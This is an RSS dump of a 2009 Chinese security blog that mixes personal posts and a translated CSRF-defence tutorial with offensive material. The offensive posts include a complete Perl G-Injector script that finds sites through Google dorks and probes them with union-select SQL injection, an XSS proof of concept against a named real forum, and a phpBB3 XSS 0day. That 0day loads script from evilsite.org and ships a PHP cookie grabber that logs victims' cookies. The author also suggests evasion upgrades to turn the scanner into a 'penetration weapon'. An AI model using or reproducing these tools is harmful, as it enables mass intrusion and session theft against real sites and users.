<![CDATA[召唤]]> http://www.patching.net/zhaohuan/ zh-cn PBlog2 v2.4 召唤 http://www.patching.net/zhaohuan/images/logos.gif http://www.patching.net/zhaohuan/ 召唤 http://www.patching.net/zhaohuan/article.asp?id=259 <![CDATA[SimpleDorkGUi & G-Injector]]> sunsp2@163.com(ZhaoHuAn) Sat,30 May 2009 00:11:59 +0800 http://www.patching.net/zhaohuan/default.asp?id=259
SimpleDorkGUi< rong>是low1z< rong>今年年初用python写的一个图形界面的注入点搜索程序,现在已经推出了第二版。它可以通过根据你指定的搜索参数来进行搜索包含sql注入的地址,并判断数据类型。缺点是不能保存当前搜索进程以便下次的继续探测,不过0.2版本已经中加入了这个功能。



0.2版的代码在:
http://www.darkc0de.com/others/simpleDorkGUi.py

/*老版本0.1版在win下运行的话,这里有处代码要修改下:
程序代码 程序代码
txtField = Text(myFrame, font=('Verdana', 8, ''),fg='orange', bg='black', width=400, height=32, wrap=WORD, yscrollcommand=scb.set)
否则你将会看不到下面的操作工具栏;) */

0.1版建议运行在python 2.x版本上,因为python 3.x的不向后兼容,一些类似exec和print语句在3.x版本被去除或修改了导致程序报错。如果非要在3.x下运行的朋友可以自己修改一下代码,或者用官方提供的转换器转换一下:
Py(2to3)
http://svn.python.org/view/sandbox/trunk/2to3/


G-Injector(perl)< rong>是法国小伙jonathan59< rong>的作品,以前常在h4cky0u玩的朋友应该对他比较熟悉




代码如下:
程序代码 程序代码
#!/usr/bin/perl
# http://rk-project.tk
# bsnseabra@hotmail.com
# zer0xProud © greetz to Gladiator
# Sábado, 10 de Janeiro de 2009
use LWP::UserAgent;
my $top = LWP::UserAgent->new();
$top->timeout(10);
$top->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/3.0");
unless($ARGV[2]) {
   print "=> G-Injector <=\n";
   print "=> Use: ginjector.pl \"dork\" limit sqltest.txt\n";
   print "=> Visit Us unkn0wn.ws! <=\n";
exit 0;
}
open(WEBSITES, ">>", $ARGV[2])or die("File No Exists\n");
chomp($ARGV[0]);
syswrite STDOUT, "=><=>=<=>=<=>=<=>=<=\n";
syswrite STDOUT, "=> G-Injector 1.0 <=\n";
syswrite STDOUT, "=><=>=<=>=<=>=<=>=<=\n";
googler($ARGV[0],$ARGV[2]);
close(WEBSITES);
fin();
sub inject{
    syswrite STDOUT, "=> Verifing.. $_[0]=\n";
    syswrite STDOUT, "=> Vulnerable??: ";
    my $weborig = $_[0] . "=";
    my $injhex = "-1+union+select+0x6c333374";
    my $injnum = "-1+union+select+0";
    my $hex='0x6c333374';
    my $sw = 0;
    $webnum=$weborig . $injnum;
    $webhex=$weborig . $injhex;
    for($conta=0;$conta<=$ARGV[1];$conta++){
        if($conta>0){
            $webhex.=','.$hex;
            $webnum.=','.$conta;
        }
        $codeweb = $top->get($webhex . "--");
        if($codeweb->is_success){
            $getcodeweb = $codeweb->content;
            if($getcodeweb =~ /l33t/ ){
                syswrite STDOUT, "Ya!\n";
                $sw = 1;
                $conta = $_[1] + 1;
                print WEBSITES "$webnum--\n";
                schemauser($webhex,$webnum);
            }
        }
    }
    if($sw == 0){
        syswrite STDOUT, "n0p!\n";
    }
}
sub fin{
    print "\n Ok, Scan Finished, Thanks, Visit us unkn0wn.ws\n";
}
sub schemauser{
    my $schinj = "+from+information_schema.tables--";
    my $userinj = "+from+mysql.user--";
    syswrite STDOUT, "=> Information Schema?: ";
    my $ws = $_[0] . $schinj;
    my $wwss = $_[1] . $schinj;
    my $webschema = $top->get($ws);
    if($webschema->is_success){
        $getwebschema = $webschema->content;
        if($getwebschema =~ /l33t/ ){
            syswrite STDOUT, "Ya!\n";
            print WEBSITES "$wwss\n";
        }else{
            syswrite STDOUT, "n0p!\n";
        }
    }
    syswrite STDOUT, "=> mysql.User??: ";
    my $wu = $_[0] . $userinj;
    my $wwuu = $_[1] . $userinj;
    my $webuser = $top->get($wu);
    if($webuser->is_success){
        $getwebuser = $webuser->content;
        if($webuser =~ /l33t/ ){
            syswrite STDOUT, "Ya!\n";
            print WEBSITES "$wwuu\n";
        }else{
            syswrite STDOUT, "n0p!\n";
        }
    }
}
sub cleared{
    my $sha = $_[0];
    if($sha =~ /\=/ ){
        @splitweb=split("=",$sha);
        inject($splitweb[0]);
    }
}
sub googler{
    sleep(1);
    syswrite STDOUT, "Wait Please....\n";
    for($numpag=0;$numpag<=40;$numpag=$numpag+10){
        my $find = 'arch?hl=es" target="_blank" rel="external">http://www.google.com.ar arch?hl=es&q=' . $_[0] . '&start=' . $numpag . '&sa=N';
        my $resweb = $top->get($find);
        if($resweb->is_success){
            $getwebs = $resweb->content;
            while($getwebs =~ m/<h3 class\=r><a href\=\"(.*?)\" class\=/g ){
                cleared($1);
            }
        }
    }
}

比前者多了个后续的自动检测注入点的功能.并可定义将注入结果时时保存。

代码都是开源的,有兴趣的同学可以参考修改下。可以考虑加入代理功能和清除cookies来突破google的搜索请求限制、更多注入特征的判断、变形判断字符来打造成渗透利器:)]]> http://www.patching.net/zhaohuan/article.asp?id=258 <![CDATA[[MS09-012]Token Kidnapping 安全补丁(KB956572)]]> sunsp2@163.com(ZhaoHuAn) Mon,20 Apr 2009 16:55:07 +0800 http://www.patching.net/zhaohuan/default.asp?id=258
http://www.microsoft.com/downloads/details.aspx?familyid=73D2324F-BE59-4B0C-B1AC-9876A13C2C03&displaylang=zh-cn]]> http://www.patching.net/zhaohuan/article.asp?id=257 <![CDATA[Discuz <=7.0(frame.php) xss Vulnerability]]> sunsp2@163.com(ZhaoHuAn) Sat,18 Apr 2009 22:08:57 +0800 http://www.patching.net/zhaohuan/default.asp?id=257

PoC:

程序代码 程序代码
http://bbs.cctv.com/index.php?gid=24"></iframe><script>alert(document.cookie)</script>


----->
  跳转到了
程序代码 程序代码
http://bbs.cctv.com/frame.php?frameon=yes&referer=http%3A//bbs.cctv.com/index.php%3Fgid%3D24%22%3E%3C/iframe%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E




]]> http://www.patching.net/zhaohuan/article.asp?id=256 <![CDATA[摘一下老爸发的留言。]]> sunsp2@163.com(ZhaoHuAn) Thu,09 Apr 2009 21:21:01 +0800 http://www.patching.net/zhaohuan/default.asp?id=256 人的一生怎样都可以度过,默默无闻的是一生,煊煊赫赫的也是一生。但为人者总要对生命负责。伟大、英雄未必人人能够,但总得建功立德,总要活出人的尊严。有本事要靠本事,没本事也要有德行。生命可以承受无边的苦难,但承受不了无足轻重;生命可以承受贫病交加,但承受不了同类的冷落;生命可以承受挫折失败,但承受不了尊严的失缺;生命也可以承受忍辱负重,但它承受不了永无成功的荣耀。一个人在百年之内总得为自己的生命挣得一点自豪与骄傲,也应该在自己力所能及的层级上,为生命挣下一两次可以在众人之中君临端坐的首席之位。即使生命对此并无奢求,也要有一点点创造,有一点点作为,来证明自己曾在这个世界上活过。 ]]> http://www.patching.net/zhaohuan/article.asp?id=255 <![CDATA[做了一回伪歌迷~]]> sunsp2@163.com(ZhaoHuAn) Mon,22 Sep 2008 22:42:35 +0800 http://www.patching.net/zhaohuan/default.asp?id=255





这个手拍得很灵异~







最后一起合了张影~ 就不PO上来了~ 感谢朋友爱情证书和百度娱乐杨嘉~]]> http://www.patching.net/zhaohuan/article.asp?id=254 <![CDATA[逛街·随手拍的~]]> sunsp2@163.com(ZhaoHuAn) Mon,22 Sep 2008 22:36:27 +0800 http://www.patching.net/zhaohuan/default.asp?id=254




]]> http://www.patching.net/zhaohuan/article.asp?id=253 <![CDATA[@上海]]> sunsp2@163.com(ZhaoHuAn) Sun,14 Sep 2008 22:41:03 +0800 http://www.patching.net/zhaohuan/default.asp?id=253
  到上海的飞机晚点,刚下飞机就匆忙打车到公司(前面省略排队候车20分钟#-_-!!),天公不作美,大暴雨,路上的积水将近20厘米厚,南方就是这么滋润啊,让我顿时倍感亲切:O 司机师傅说星期五很多公司提早下班或者不上班,又下雨,交通一定是非常之堵。印象中是很久很久才到公司,司机师傅又把3号楼错认为是第3期楼,后来san哥跟我说原来SystEm32来的时候貌似也停这里,所以我一直怀疑是不是跟SystEm32坐的一辆车。。

  san哥打着伞在门口接我,挖,终于见到崇拜已久的san师傅了,穿着nsfocus的黑色T恤,因为san哥素来低调,就不描述太多以免被K,膜拜一下 ^.^  进了会议室后san哥拿了些巧克力和饼干给我,因为中午在飞机上随便吃了点,旅途劳累啊,还真有点饿了:P  然后就是久仰的cnhawk师傅,就跟他聊起天来,而且我发现cnhawk师傅是跟谁聊都能让对方觉得非常开心的,HOHO。面试的时候SystEm32来了,32是一个很好的兄弟,只比我大三岁,但技术功底非常扎实,用CC总的话说,技术很好,小伙子很帅,呵呵,崇拜啊。。认识了一个很好的兄弟:)
  
  晚上部门领导请大家吃饭,……省略N字,平时很少喝酒,不胜酒力啊。。。Orz(算是明白32为什么有意要加强喝酒训练了) 晕忽忽的跟san哥回家了,就记得打车时等了很久都不等不到。

  这些天都住在san哥家,还是复式的房子,很宽敞,一个精致的小楼梯通2层,我自己住一间,很舒服,哈哈,有机会上楼梯看看,san哥和嫂子很照顾我又很客气,真的觉得很不好意思,早知道星期一过来就好了,给san哥夫妇添了不少麻烦啊..  

  恩。。嫂子做的鱿鱼和绿豆稀饭非常好吃:P

  想到哪就说到哪吧。。呵呵,星期天,没什么事,san哥带我在上海到处逛逛,顺便吃点小吃。我们就到城隍庙附近落脚,这一带应该还是外地人多些,上海老街嘛,大多数是来旅游的,装扮得细致古朴,很有特色,Keywords:古玩、茶、书画、老字号、客栈、购物街、小吃街……  






  这里的店铺名字也别具旧上海风格,特别需要提起的是san哥发现的一个名叫“春风得意楼”的茶馆,令人浮想联翩啊~

  接着我们步行到了外滩,穿过一个小公园(公园尽头是一个咖啡厅,咖啡厅底部是一个循环过滤的池子,里面养了很多很多漂亮锦鲤,乐坏我了,我喜欢的鱼儿们啊!下次再来看你们:p )就来到了浦江大桥,对面的东方明珠电视塔等标志性建筑就清晰的展现在了面前,可惜还是有一段距离,不然可以拍得很清楚:)




  黄浦江


  san哥好像更在意后面这些即将被拆迁的建筑,的确,非常具有异国特色的设计。





  在回去的路上我们经过一处美丽的胡同,这里的街道是以省份的名字命名的,街道很干净,红绿灯旁边还有小小的鱼池,里面也有很多漂亮的小鱼,街道上一棵棵法国梧桐,很有feeling。。。



  我们回去时的地铁,就是在这栋大楼下层的



  说起地铁,就不得不说北京和上海,倒是觉得上海的地铁还好,虽然也挤,但貌似跟北京的地铁还不是一个级别的。如果有人说上海的地铁能把人挤流产,那北京的地铁就能挤怀孕。

  最后感谢san哥和cnhawk师傅送我,最近一直都是在麻烦san哥,所以心里感到特别的愧疚,将来一定不能辜负了san哥对我的一片期望才是,特别是hawk师傅还不放心我,频频回头招手与道别,想起来依然历历在目,感谢。

  总之对师傅们的感谢藏在我心中,在学校剩下的时间里要潜心学习、研究,思考好今后的研究方向。

  相信我们有这么好的团队,这么多优秀的专家,一定会越来越灿烂辉煌,上海,2009年,我们再见:)]]> http://www.patching.net/zhaohuan/article.asp?id=252 <![CDATA[[ZZ]防止CSRF攻击]]> sunsp2@163.com(ZhaoHuAn) Thu,04 Sep 2008 17:27:44 +0800 http://www.patching.net/zhaohuan/default.asp?id=252 《防止CSRF攻击》< rong>
译者:韩国峰
本文已经获得原作者Email授权----译者注
概览:

1. Hello World
2. 介绍
3. 关于认证技术
3.1 Cookies Hashing
3.2 HTTP来路
3.3 验证码
4. 一次性令牌
5. 最后的话
1.Hello World

欢迎来到崭新的Playhack.net的新季度开题项目报告。我非常高兴您能够再次回来让我们的c001项目重现。

希望您能喜欢这个新的短篇论文,我邀请你浏览位于http://www.playhack.net的全部新项目。

开始:几乎没有什么,只是一点香烟!:

呐喊:我向我的playhack m8s null,omni,god and emdel,ofc o str0ke大声呐喊!NEX 回来了。
2.介绍

我 对跨站请求伪造(Cross Site Request Forgery,即CSRF)技术有一定研究,但是对网站开发者应当采取的措施研究不深。这些日子在编写一个对用户和管理员(这些人对他们的任务并不明 晰:P)有高度安全要求的分布式网站程序时,我被这个话题深刻的纠缠了。

针对这种情况,我必须考虑程序最终可能受到的各个方面的可能的攻击威胁。

给我最多麻烦的就是Session欺骗(或者CSRF,你可以按照自己喜欢的方式称呼),因为这种攻击是完全以用户的身份,因此并没有百分百的可能性来防止它。

如果你对我刚才说所的Session欺骗并不太了解,那么你可以阅读:http://www.playhack.net/view.php?id=30
3.可行措施

Ok,从这里开始,我必须假定你对Session欺骗攻击的实施方法已经深刻领会了:P

让我们开始新的继续。

考虑到一个已经登录到网站的受信用户可以完成一些重要的或者私密的操作,攻击者尝试记性一个可能的登录攻击(但是大多数情况下是不可行的)并且得到已经登录用户的Session来实现其巧妙的行为。

为 了劫持用户的Seession,入侵者精心构造一个适当的网页,在这个网页中包含了隐藏的JavaScript函数来重新创造一个原始操作表单,但是攻击 者却修改了一些表单值,然后攻击者让受攻击者访问该页面,此时页面加载过程会提交上述表单到一个远程页面,以隐秘地完成一个请求(此时受攻击者并不知 道),他们用这种方法利用了用户的受信身份。

这种方式简单解释了Session欺骗攻击是如何工作的,但是一个重要的问题是,"我如何避免我的用户成为这种攻击的受害者?"

现在,你可能想到如下的几种方法:

检查Cookies凭据
检查HTTP请求来路
使用验证码
但是经过一些尝试,你会发现这些方法不是我们应当采取的最合适的解决方式,让我们一个个的来看为什么。
3.1 Cookies Hashing

第一个方案可能是解决这个问题的最简单和快捷的方案了,因为攻击者不能够获得被攻击者的Cookies内容,也就不能够构造相应的表单。

这个问题的实现方法与下面的类似。在某些登录页面我们根据当前的会话创建Cookies:
程序代码 程序代码
<!-- login.php -->
<?php
// Cookie value
$value = "Something from Somewhere";
// Create a cookie which expires in one hour
setcookie("cookie", $value, time()+3600);
?>
<!-- EOF -->
在这里,我们在Cookies中使用了散列来使得这个表单可被认证。
程序代码 程序代码
<!-- form.php -->
<?php
// Hash the cookie
$hash = md5($_COOKIE['cookie']);
?>
<form method="POST" action="resolve.php">
<input type="text" name="first_name">
<input type="text" name="last_name">
<input type="hidden" name="check" value="<?=$hash;?>">
<input type="submit" name="submit" value="Submit">
</form>
<!-- EOF -->

此时,后台的动态网页部分可以进行如下操作:
程序代码 程序代码
<!-- resolve.php -->
<?php
// Check if the "check" var exists
if(isset($_POST['check'])) {
$hash = md5($_COOKIE['cookie']);
// Check if the values coincide
if($_POST['check'] == $hash) {
do_something();
} else {
echo "Malicious Request!";
}
} else {
echo "Malicious Request!";
}
?>
<!-- EOF -->
事 实上,如果我们不考虑用户的Cookies很容易由于网站中存在XSS漏洞而被偷窃(我们已经知道这样的事情并不少见)这一事实,这是一个很好的应对对 CSRF的解决方案。如果我们为用户的每一个表单请求中都加入随机的Cookies,那么这种方法会变得更加安全,但是这并不是十分合适。
3.2 HTTP来路

检 测访问来路是否可信的最简单方法是,获得HTTP请求中的来路信息(即名为Referer的HTTP头--译者注)并且检查它来自站内还是来自一个远程的恶 意页面:这是一个很好的解决方法,但是由于可以对服务器获得的请求来路进行欺骗以使得他们看起来合法,这种方法不能够有效防止攻击。

让我们来看看为什么这并不是一个合适的方法。

下面的代码展示了HTTP Referer实现方法的一个例子:
程序代码 程序代码
<!-- check.php -->
if(eregi("www.playhack.net", $_SERVER['HTTP_REFERER'])) {
do_something();
} else {
echo "Malicious Request!";
}
<!-- EOF -->

这个检测则会轻易的忽略掉来自某个攻击者伪造的HTTP Referer欺骗,攻击者可以使用如下代码:

header("Referer: www.playhack.net");

或者其他在恶意脚本中伪造HTTP头并发送的方法。

由于HTTP Referer是由客户端浏览器发送的,而不是由服务器控制的,因此你不应当将该变量作为一个信任源。
3.3 验证码

另外一个解决这类问题的思路则是在用户提交的每一个表单中使用一个随机验证码,让用户在文本框中填写图片上的随机字符串,并且在提交表单后对其进行检测。

这个方法曾经在之前被人们放弃,这是由于验证码图片的使用涉及了一个被称为MHTML的Bug,可能在某些版本的微软IE中受影响。

你可以在Secunia的站点上获得关于此缺陷的详细信息:cunia.com/advisories/19738/" target="_blank" rel="external">http:/ cunia.com/advisories/19738/

这里是Secunia关于此Bug解释的概述:

"此缺陷是由于处理"mhtml:"的URL处理器重定向引起的。它可以被用来利用从另外一个网站访问当前的文档"

在同一个页面你会找到来自Secunia工作人员的网站测试方法。

事实上,我们知道,这个Bug已经被微软放出的Windows XP和Windows Vista及其浏览器IE6.0的修复包所解决了。

即使他的确出现了安全问题,这么长时间也会有其他的可靠方案出现。

4.一次性令牌

现在让我们来看经过研究,我希望介绍的最后一种解决方案:在使用这些不可靠的技术后,我尝试做一些不同然而却是更有效的方法。

为了防止Web表单受到Session欺骗(CSRF)的攻击,我决定检测可能被伪装或伪造的每一个项目。因此我需要来创造一次性令牌,来使得在任何情况下都不能够被猜测或者伪装,这些一次性令牌在完成他们的工作后将被销毁。

让我们从令牌值的生成开始:
程序代码 程序代码
<!-- start function -->
<?php
function gen_token() {
// Generate the md5 hash of a randomized uniq id
$hash = md5(uniqid(rand(), true));
// Select a random number between 1 and 24 (32-8)
$n = rand(1, 24);
// Generate the token retrieving a part of the hash starting from
// the random N number with 8 of lenght
$token = substr($hash, $n, 8);
return $token;
}
?>
<!-- EOF -->

PHP函数uniqid()允许web开发者根据当前的时间(毫秒数)获得一个唯一的ID,这个唯一ID有利于生成一个不重复的数值。

我们检索相应ID值的MD5散列,而后我们从该散列中以一个小于24的数字为开始位置,选取8位字母、

返回的$token变量将检索一个8位长的随机令牌。

现在让我们生成一个Session令牌,在稍后的检查中我们会用到它。
程序代码 程序代码
<!-- start function -->
<?php
function gen_stoken() {
// Call the function to generate the token
$token = gen_token();
// Destroy any eventually Session Token variable
destroy_stoken();
// Create the Session Token variable
session_register(STOKEN_NAME);
$_SESSION[STOKEN_NAME] = $token;
}
?>
<!-- EOF -->
在这个函数中我们调用gen_token()函数,并且使用返回的令牌将其值复制到一个新的$_SESSION变量。

现在让我们来看启动完整机制中为我们的表单生成隐藏输入域的函数:

程序代码 程序代码
<!-- start function -->
<?php
function gen_input() {
// Call the function to generate the Session Token variable
gen_stoken();
// Generate the form input code
echo "<input type=\"hidden\" name=\"" . FTOKEN_NAME . "\"
value=\"" . $_SESSION[STOKEN_NAME] . "\"> ";
}
?>
<!-- EOF -->
我们可以看到,这个函数调用了gen_stoken()函数并且生成在WEB表单中包含隐藏域的HTML代码。

接下来让我们来看实现对隐藏域中提交的Session令牌的检测的函数:

程序代码 程序代码
<!-- start function -->
<?php
function token_check() {
// Check if the Session Token exists
if(is_stoken()) {
// Check if the request has been sent
if(isset($_REQUEST[FTOKEN_NAME])) {
// If the Form Token is different from Session Token
// it's a malicious request
if($_REQUEST[FTOKEN_NAME] != $_SESSION[STOKEN_NAME]) {
gen_error(1);
destroy_stoken();
exit();
} else {
destroy_stoken();
}
// If it isn't then it's a malicious request
} else {
gen_error(2);
destroy_stoken();
exit();
}
// If it isn't then it's a malicious request
} else {
gen_error(3);
destroy_stoken();
exit();
}
}
?>
<!-- EOF -->
这 个函数检测了$_SESSION[STOKEN_NAME]和$_REQUEST[FTOKEN_NAME]的存在性(我使用了$ _REQUEST方法来使得GET和POST两种方式提交的表单变量均能够被接受),而后检测他们的值是否相同,因此判断当前表单提交是否是经过认证授权 的。

这个函数的重点在于:在每次检测步骤结束后,令牌都会被销毁,并且仅仅在下一次表单页面时才会重新生成。

这些函数的使用方法非常简单,我们只需要加入一些PHP代码结构。

下面是Web表单:
程序代码 程序代码
<!-- form.php -->
<?php
session_start();
include("functions.php");
?>
<form method="POST" action="resolve.php">
<input type="text" name="first_name">
<input type="text" name="last_name">
<!-- Call the function to generate the hidden input -->
<? gen_input(); ?>
<input type="submit" name="submit" value="Submit">
</FORM>
<!-- EOF -->

下面是解决的脚本代码:
程序代码 程序代码
<!-- resolve.php -->
<?php
session_start();
include("functions.php");

// Call the function to make the check
token_check();

// Your code
...
?>
<!-- EOF -->
你可以看到,实现这样一个检测是十分简单的,但是它可以避免你的用户表单被攻击者劫持,以避免数据被非法授权。
5.结论

让我们对这篇简短的论文做一个结论,你的Web应用程序没有百分百的安全,但是你可以开始避免绝大多数普通的攻击技术。

我希望您关注的另一个要点是,Web开发者不应当忽视一般的程序错误(例如XSS 浏览器漏洞等等),不将这些考虑为对您的用户的潜在威胁是一个巨大的错误:你应该永远记得它们将影响程序的信任性、安全性和互操作性。

Cya!

nexus


还有LGN21ST的一篇< rong>
从Rails 2开始,默认使用cookie来保存session,于是很多关于安全上的置疑被频繁提及。尤其是cross-site request forgery(CSRF)攻击。

在Rails2中预防CSRF其实很容易,首先确保在application.rb中包含protect_from_forgery调用
程序代码 程序代码
Ruby代码
class ApplicationController < ActionController::Base  
  protect_from_forgery  
end  

class ApplicationController < ActionController::Base
  protect_from_forgery
end


至此,所有用form_for或者form_tag等生成的表单均被隐藏注入一个特别的基于用户session生成的token,在表单被提交时一并将token提交至服务器并接受服务器端的检查。

如果你象我一样喜欢自己手写Ajax Post请求代码,但是没有包含这个token的话,服务器端会报'verify_authenticity_token'错误,如何得到这个token呢?我的做法是在页面头部先得到这个token,赋值给一个JS的全局变量,在之后的Ajax代码中就可以直接引用啦,主意,一定要在Ajax调用代码之前作这一步,最保险的位置是在页面第一行。
程序代码 程序代码
Ruby代码
<%= javascript_tag "var authenticity_token = '#{form_authenticity_token}';" %>  

<%= javascript_tag "var authenticity_token = '#{form_authenticity_token}';" %>


Ajax代码大概可以这样写
程序代码 程序代码
Ruby代码
new Ajax.Request(  
  request_path,  
  {method:'post',  
   parameters:'authenticity_token=' + encodeURIComponent(authenticity_token)});  



test]]> http://www.patching.net/zhaohuan/article.asp?id=251 <![CDATA[二版科技寄来的NOD32安全套装]]> sunsp2@163.com(ZhaoHuAn) Fri,22 Aug 2008 15:37:28 +0800 http://www.patching.net/zhaohuan/default.asp?id=251 X通快递< rong>的原因,出现了以下抽象效果,特此拍照。
充分验证了国内快递公司暴力运输的事实,绝对是对经典力学的运用,怪不得网上流传:有一个分尸案,其实杀人者本来并没有分尸,只是把尸体用X通快递寄出去后....分尸案就产生了。< rong>



还好里面的东西没坏,内附光盘1、readme、环保袋1




虽然对我来说并没有很大的实际用处,但送给MM是没戏了~

准备把照片给王总看看,晚上有空再分析一下激活系统。]]> http://www.patching.net/zhaohuan/article.asp?id=250 <![CDATA[XSS Private Messagging On PhpBB3(0day)]]> sunsp2@163.com(ZhaoHuAn) Mon,18 Aug 2008 10:22:14 +0800 http://www.patching.net/zhaohuan/default.asp?id=250 # #
# Authors: Dante90, WaRWolFz Crew #
# T0T4L, Ex Member Crew #
# Title: XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8] #
# MSN: dante90.dmc4@hotmail.it #
# Web: www.warwolfz.org #
# Description: XSS (Cross Site Scripting), Grab Status: 100%. #
# #
################################################## ####################################
XSS Private Messagging On PhpBB3 By Dante90 [0-Day & Priv8]< rong>

程序代码 程序代码
http://TRAGET/ucp.php?i=pm&mode=compose&action=reply&f=[xss]&p=6779


Where is:

程序代码 程序代码
[xss] = '';!--"<script>alert(document.cookie);</script>=&{(alert(1))}



Redirect Code [Ascii --> Hex]:

程序代码 程序代码
[xss] = %3c%73%63%72%69%70%74%20%73%72%63%3d%68%74%74%70%3 a%2f%2f%77%77%77%2e%65%76%69%6c%73%69%74%65%2e%6f% 72%67%2f%66%69%6c%65%2e%6a%73%3e
(<script src=http://www.evilsite.org/WaRWolFz/file.js>)



Cookies grabber:

程序代码 程序代码
<?php

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['warwolfz'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nU ser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('cookies.html' , 'a');
fwrite($file,$text);
fclose($file);

?>
]]>